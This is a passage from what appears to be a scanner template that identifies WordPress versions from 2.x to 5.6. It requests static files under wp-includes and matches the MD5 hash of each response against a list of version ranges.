"(\"dd83030fdd725c148b2b7a4aded9da13\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"f3a8ace36ec4e062874b89d6dfddde82\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"dbda3aebfc716b2bc73abe6600b65d52\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.json" - matchers: - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"bff751d0bdde38eebbe0c90df8a510cc\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"899efe22d79dd0d675c106a242e18858\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/readme.md" - matchers: - - type: dsl - name: 3.9 - 4.7.19 - dsl: - - "(\"7a0f64800cf38b2be8d3dc4540ec31dd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.json" - matchers: - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"fcf1ab0bbad7d5be115cac9ffb360a2b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e041fb0d325f73103a921ed01e5356b7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/moxieplayer.swf" - matchers: - - type: dsl - name: 3.9 - 4.7.19 - dsl: - - "(\"4e59d34efb2da0b9a033596a85e4b1ef\" == md5(body))" - - type: dsl - name: 3.4 - 3.8.35 - dsl: - - "(\"9217cea72c76c361fa5033526712284e\" == md5(body))" - - type: dsl - name: 3.5.2 - 3.6.1 - dsl: - - "(\"f1cb08168139602b35bc61f1d9823ea3\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"534258f2d5d40b3b683940d19f585695\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpembed/plugin.min.js" - matchers: - - type: dsl - name: 4.4 - 4.7.19 - dsl: - - "(\"7ec45bcbe992c74c095a75bb2d2cf0ff\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpembed/plugin.js" - matchers: - - type: dsl - name: 4.4 - 4.7.19 - dsl: - - "(\"cf382af5522fa9a0bb3f049225de14ef\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/wlwmanifest.xml" - matchers: - - type: dsl - name: 3.8 - 5.6 - dsl: - - "(\"dfd490b6f383ea02a269031ff05e8896\" == md5(body))" - - type: dsl - name: 3.4 - 3.7.35 - dsl: - - "(\"b23aa270acc2240a9a22082550a8680c\" == md5(body))" - - type: dsl - name: 2.7 - 3.3.3 - dsl: - - "(\"8da76e497b2666873eaa3b2f9f19617b\" == md5(body))" - - type: dsl - name: 2.3.1 - 2.6.5 - dsl: - - "(\"3dad0a2b069875a78bfc7c21554f0a24\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wpicons.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"6453fcf875718d91560f5faedce361f4\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"066d3d4d2b5b1f32ea2ee76f536aa445\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"90dd81a3ac5697aca79a34a9b1bfa8fa\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"968a7e190df87105abfa07fef2d3fe61\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/icon-pointer-flag.png" - matchers: - - type: dsl - name: 3.3 - 5.6 - dsl: - - "(\"b0d32c87f2ad8bc2455ebf6a60171027\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wlw/wp-comments.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"4cc2365d0450dedec30cec2e73a8a1d4\" == md5(body))" - - type: dsl - name: 2.3.1 - 3.4.2 - dsl: - - "(\"f12204bb737213d9c0b530b918da182d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wlw/wp-icon.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"311d098eca9a89370877334b1b8f992a\" == md5(body))" - - type: dsl - name: 2.3.1 - 3.4.2 - dsl: - - "(\"e44d22b74f7ee4435e22062d5adf4a6a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wlw/wp-watermark.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"3b9a87754d6ddcad447c89778e93c544\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c173b88f257603b0ea51aec2c03bec4b\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"708ebef70c64f23294d63347ececebe7\" == md5(body))" - - type: dsl - name: 2.3.1 - 3.4.2 - dsl: - - "(\"c5a6a59365ad54aa20c71e79da9dfd7a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/uploader-icons.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"b4011d935c0f4dcf0cffc0f99d6d9680\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"707b402719c2a935cc7106b1b60bffee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/toggle-arrow-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"46cae1ca5cf883f4c91243447215ef11\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/toggle-arrow.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"dcdfce879761fde6123beb64cecf2af2\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"8e9022f98e990584452838f85d77c928\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"e5064769584f17a701131db269226700\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/uploader-icons-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"adc1e7b0262d80e44f18a287c395cb7e\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c1b082fb2f7786b2562c601497ea5dbc\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"ef35cb53941bef570b89317c4fba357c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/w-logo-blue.png" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"fd5b4eb05706a2f05f707fe077ae1030\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/admin-bar-sprite-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"eb51ac1312eb060b9bc638fef46f80ca\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"f86b87253d8c6afb3197eebe4695a7a4\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"aae29dcdbdab4a1fbe6696c9f6b82cf0\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"f33596ef4918f4902d084f1ccf3261f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/rss-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"c71759615ba051c1e6f597fd726a9d11\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/text.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"7ab98773e6e430f718c89d9f5119804b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/document.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"76e5349938f6ce9179931436de1c64a3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/interactive.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"52d7accb82aef17fc2c3b4c58968dc48\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/spreadsheet.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"f1c0a034e4f112d60054fcdecc873fb2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/video.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"8de0e9f175ea68179b81dddb71a010f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/code.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"2d6f96130cad55ca9310eed555a9555f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/default.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"2db6a9e6cd49d2429668ce40e0dee762\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/archive.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"113914d2eedff268fb00dad3c3ac9175\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/media/audio.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"8674614341f1bec5feb22eb7e75adfc0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/icon-pointer-flag-2x.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"a9e5e1a632f1b3b962e4c426d55acc72\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wpicons-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"c3e76ed756c4056fa9249a944f667e37\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"dd625d0d794415c1fbb229f4f10218c8\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e7792025943f6c6f219e566bf2f79aa9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/arrow-pointer-blue.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"779ffc62e3ce872a4cabb2c35bbb14f9\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"5703fed2bbf0319df846ad18b980b1a1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/admin-bar-sprite.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"53cf11a41f973a80570e0ecac5d3fe5e\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"62834b32c7fff8e341ed4b77292a4555\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"063f8eaa151e3f80e037a977a70c9d82\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"f22dab01a22a010df54fddbef11f0d73\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/mrgreen.png" - matchers: - - type: dsl - name: 4.2 - 5.6 - dsl: - - "(\"2d35c1e05eb1949106d34add6a9d9dda\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/simple-smile.png" - matchers: - - type: dsl - name: 4.2 - 5.6 - dsl: - - "(\"e94bb2cf7bc285138eb166b201779768\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/frownie.png" - matchers: - - type: dsl - name: 4.2 - 5.6 - dsl: - - "(\"519bf3d0051b841e0cb08dc4f4831eed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/smilies/rolleyes.png" - matchers: - - type: dsl - name: 4.2 - 5.6 - dsl: - - "(\"20bebef0054f851332df4f66dda3698d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/arrow-pointer-blue-2x.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"256de214110572de8c5d34b8391163cf\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"8b6f52b65ca4d5805b061266d8bd3817\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"431a3e3d7139b7a17b7663c02246445d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/text.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"90cc20d1b2aafc23be64ff2511e35bb5\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"681932d1f666acaa97582ecb22309011\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"17c0cf58506a41596a42a7a28030e951\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/document.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"7f89275e639a73c0f9c4448bf933545c\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"5d9bd2b7c1a6de4cd60db260705a0d4a\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"e6d7abf70fe3653e0e7208da55b3dbdc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/interactive.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"af52cf6d60f2edba609939a70304e601\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"534872ce342d27be12c21a24a3c960ea\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"cc537b760f40258679df957cbe061a0e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/spreadsheet.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"358639f8d0a20c318054cb01c76ea4ea\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"b0b5df1b422cc9300b05604a7a71b06c\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"b3954af9d01078755e8d2e8e819bb31a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/video.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"94010edbfd8e6ca589daa4b83bf53d0b\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"c8caf92649ddfbd515b97a455f91d113\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/code.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"1460ef31b2cffaef1cb012f531ae391f\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"7943ed0e713a89c87601daec06ba272d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/license.txt" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"f05db54c63e36918479b6651930dcfe7\" == md5(body))" - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"f01b121b601cac57c42110e8d2fc7e32\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/default.png" - matchers: - - type: dsl - name: 3.9 - 5.6 - dsl: - - "(\"41f23e292a2fbedc21ecae2d04f29bba\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"fe5f6af8b942a9ed1d5754b1e0e5ea90\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"d510e9e0ac0d9dd2af7a846029c69e2b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/archive.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"9653ca07faf08e9ccc493041020e6eeb\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"fbaa067099eb73e2dcecb3f29033e0fa\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"93a5da9e9cb5553d570a271c5b6e98fc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/crystal/audio.png" - matchers: - - type: dsl - name: 4.1 - 5.6 - dsl: - - "(\"996e56f18f3ac9cf89f347d8d42d236b\" == md5(body))" - - type: dsl - name: 3.5 - 4.0.32 - dsl: - - "(\"6b1b3153b950cb7d88b0790445892365\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"b9daa96636b39b9c94475ee4f2686e11\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/rss.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"a5b05bbf28f294b02efd942a4e5ab806\" == md5(body))" - - type: dsl - name: 2.2 - 3.4.2 - dsl: - - "(\"0ee254a56334189fd471afeec067186f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/ID3/license.commercial.txt" - matchers: - - type: dsl - name: 3.6 - 5.6 - dsl: - - "(\"0a3b670896fc4a8067adb2c6d978418e\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"d34bd7474420e22e7da463b44833a5f9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-embed-template-ie.css" - matchers: - - type: dsl - name: 4.4 - 5.6 - dsl: - - "(\"eeb729369ef309d89ed0bc7120aacadf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.silverlight.xap" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"747100c185cf33f6588930a5941d62f7\" == md5(body))" - - type: dsl - name: 3.9 - 4.3.25 - dsl: - - "(\"3c524750546de1b3aab36ff60719aebb\" == md5(body))" - - type: dsl - name: 3.7.2 - 3.8.35 - dsl: - - "(\"40dbc8d7df259f4d2df35c89c63a818b\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.1 - dsl: - - "(\"890f8967069133b1dc5a8caf35778284\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"7c8989ad91007dccb1bb4f754e9ad511\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5 - dsl: - - "(\"f3c8aaf882d1ed25a7f5fe7fd2ee4d9d\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"f571e35c675f9ae38d144501153c622b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.flash.swf" - matchers: - - type: dsl - name: 3.9.12 - 4.8.15 - dsl: - - "(\"370d768e45524f47fbd2988974d3d76c\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.1 - dsl: - - "(\"f14859fd400ef63a7a8568986d58a756\" == md5(body))" - - type: dsl - name: 3.9.4 - 4.3.3 - dsl: - - "(\"aeb99cfd67b07d467f9c39c1228c7e53\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.1 - dsl: - - "(\"7029eb89afd82d9845f711c93ca1cb47\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.8.13 - dsl: - - "(\"ee056b175f2ac1fef496493783403b69\" == md5(body))" - - type: dsl - name: 3.7.14 - 3.8.35 - dsl: - - "(\"ed20d984b757ad5291963389fc209864\" == md5(body))" - - type: dsl - name: 3.3.2 - 3.5 - dsl: - - "(\"70fe6deae2bdb29aa32d3565bf20ff0a\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.1 - dsl: - - "(\"e0608fadfa2ed83ee4c2a6e223c2d668\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/license.txt" - matchers: - - type: dsl - name: 3.3 - 5.6 - dsl: - - "(\"751419260aa954499f7abaabaa882bbe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/plupload/plupload.full.min.js" - matchers: - - type: dsl - name: 4.4 - 4.8.15 - dsl: - - "(\"4a431fb4049b24566d27c12e2793d818\" == md5(body))" - - type: dsl - name: 3.9 - 4.3.25 - dsl: - - "(\"9349f636c747a5e983020a1cb7213a44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/json2.js" - matchers: - - type: dsl - name: 4.4 - 5.6 - dsl: - - "(\"73a1d77b4e827c45061f4fab041030a9\" == md5(body))" - - type: dsl - name: 3.5 - 4.3.25 - dsl: - - "(\"74d903049683e5bbea9ccb7544a42bca\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"ba3293970e13b03a2ea92f5b6b5bf544\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f5bd5c7e83c8f1f24ba27f8cf4c6085a\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"8156bfae0ea8bccaf938c35ed9e1bdf5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imgareaselect/border-anim-v.gif" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"20c97a21993cf137ead9fdbecbc42aa8\" == md5(body))" - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"a786bb7ed6d1cdc6146f086a22d0342d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imgareaselect/border-anim-h.gif" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"5ac3c42cc86e745a5e36b67b4c70a134\" == md5(body))" - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"50da31b23fdd3f5585dffd363c310456\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imgareaselect/imgareaselect.css" - matchers: - - type: dsl - name: 3.4 - 5.6 - dsl: - - "(\"7d28cad92829b3d633a087b5f3b595af\" == md5(body))" - - type: dsl - name: 2.9 - 3.3.3 - dsl: - - "(\"ab3433daec7c5e17e5383221dc507f61\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/thickbox/macFFBgHack.png" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"189217c8b067ef86add757922c2f75b4\" == md5(body))" - - type: dsl - name: 2.6.1 - 3.4.2 - dsl: - - "(\"6e63d8058c61e28953cc285de8d5c37d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/thickbox/loadingAnimation.gif" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"ce2268030dd2151b63cdf4ffc2f626ba\" == md5(body))" - - type: dsl - name: 2.5 - 3.4.2 - dsl: - - "(\"c33734a1bf58bec328ffa27872e96ae1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tw-sack.js" - matchers: - - type: dsl - name: 2.1 - 5.6 - dsl: - - "(\"b989a5bd84f6ebcbc1393ec003e6e991\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"f103f8c3fb6d11562faf82f3943459c7\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"391e1442721d3c66ebf1cee6a073017f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.speed.js" - matchers: - - type: dsl - name: 2.8.6 - 4.8.15 - dsl: - - "(\"415a3787846bb6c2d745602c2afb73ac\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.5 - dsl: - - "(\"d840d5988a2b8b64350faed539041550\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.queue.js" - matchers: - - type: dsl - name: 2.8 - 4.8.15 - dsl: - - "(\"9953522fbd4a1b02bbf635a92d76cd8f\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"128c6fd1f7089b1799bdc47ae18efc0e\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"46c7296d397c6f18dce3e70e2a35ecf4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.swfobject.js" - matchers: - - type: dsl - name: 3.2 - 4.8.15 - dsl: - - "(\"ccb51571a75637db08545caaf2ed9e73\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"cea8193a75561bb8ba40ea1809b96c67\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"56dccb3713a2375836b1167bbb66499d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.cookies.js" - matchers: - - type: dsl - name: 2.7 - 4.8.15 - dsl: - - "(\"7fa57ec00dda88dd6b5c2037ccb4d5cf\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"ffef6fda1b57107891c9a75ef2e1ae44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/swfupload/license.txt" - matchers: - - type: dsl - name: 3.1 - 5.6 - dsl: - - "(\"cbe05bb060c85e07882dc06ff751577a\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"cb7eb7a25a67239e6fb1408ee9068895\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.query.js" - matchers: - - type: dsl - name: 3.6 - 5.6 - dsl: - - "(\"3bcc587af2c7b01fc6fbc9c077050143\" == md5(body))" - - type: dsl - name: 3.1 - 3.5.2 - dsl: - - "(\"679e260910bac070e9aa6edda8e27577\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.min.js" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"e56f81676f199db7bf937e69a64909fa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.serialize-object.js" - matchers: - - type: dsl - name: 3.1 - 5.6 - dsl: - - "(\"d15c29a18d9ffa8b9b4ae86c3c0cfa22\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/suggest.min.js" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"7311075c2b411b299c94e36e2e3bab89\" == md5(body))" - - type: dsl - name: 3.9 - 4.4.24 - dsl: - - "(\"21a79ede04fa5ee9017e6bdbdba5bfe9\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"67bea18c057fd6c257d08e55a1090708\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e7b47728bbf2e6623d33b29470d04215\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.masonry.min.js" - matchers: - - type: dsl - name: 4.6.1 - 5.6 - dsl: - - "(\"cd0eb3406096ff80266e7c9d7d419186\" == md5(body))" - - type: dsl - name: 3.9 - 4.6 - dsl: - - "(\"928adcedcd52b828e51f9ec291655e01\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"fc2d7669d58e909815f1994047bf671c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.hotkeys.min.js" - matchers: - - type: dsl - name: 3.5 - 5.6 - dsl: - - "(\"e353217d4555ab5c62b367be6889813d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.ui.touch-punch.js" - matchers: - - type: dsl - name: 3.4 - 5.6 - dsl: - - "(\"4cc86d1003c45134d6838f13e3885db1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/suggest.js" - matchers: - - type: dsl - name: 4.5 - 5.6 - dsl: - - "(\"3a2474569145d51ecabf7fc4fb078982\" == md5(body))" - - type: dsl - name: 4.0 - 4.4.24 - dsl: - - "(\"bf55f3b46b05aa372a0bed97b848de9e\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"e4521a3a3b4fa0c65aac63809afb12de\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"9044d9d8599a013f7c0ca8120501c188\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"4da8fd7204488b2d4541a426c1d351ce\" == md5(body))" - - type: dsl - name: 3.1 - 3.4.2 - dsl: - - "(\"e7b47728bbf2e6623d33b29470d04215\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"3e00f1c2b48d86206943ab16d61f0336\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"a4c05e4240802706a7fa33ca1e6a8c74\" == md5(body))" - - type: dsl - name: 2.6 - 2.7.1 - dsl: - - "(\"286515e993f6d145276fcf24f4c4a352\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"024d7dd8ff67d41aff4f2735e63eb432\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.schedule.js" - matchers: - - type: dsl - name: 2.5 - 5.6 - dsl: - - "(\"0426b39754aa6bc766d89ea4c41bbd06\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.table-hotkeys.js" - matchers: - - type: dsl - name: 3.8 - 5.6 - dsl: - - "(\"a706ead694231e74fd6750b1670580a5\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"baa8747ae1cb2d15755733fa4f96f1b7\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"e56f81676f199db7bf937e69a64909fa\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - 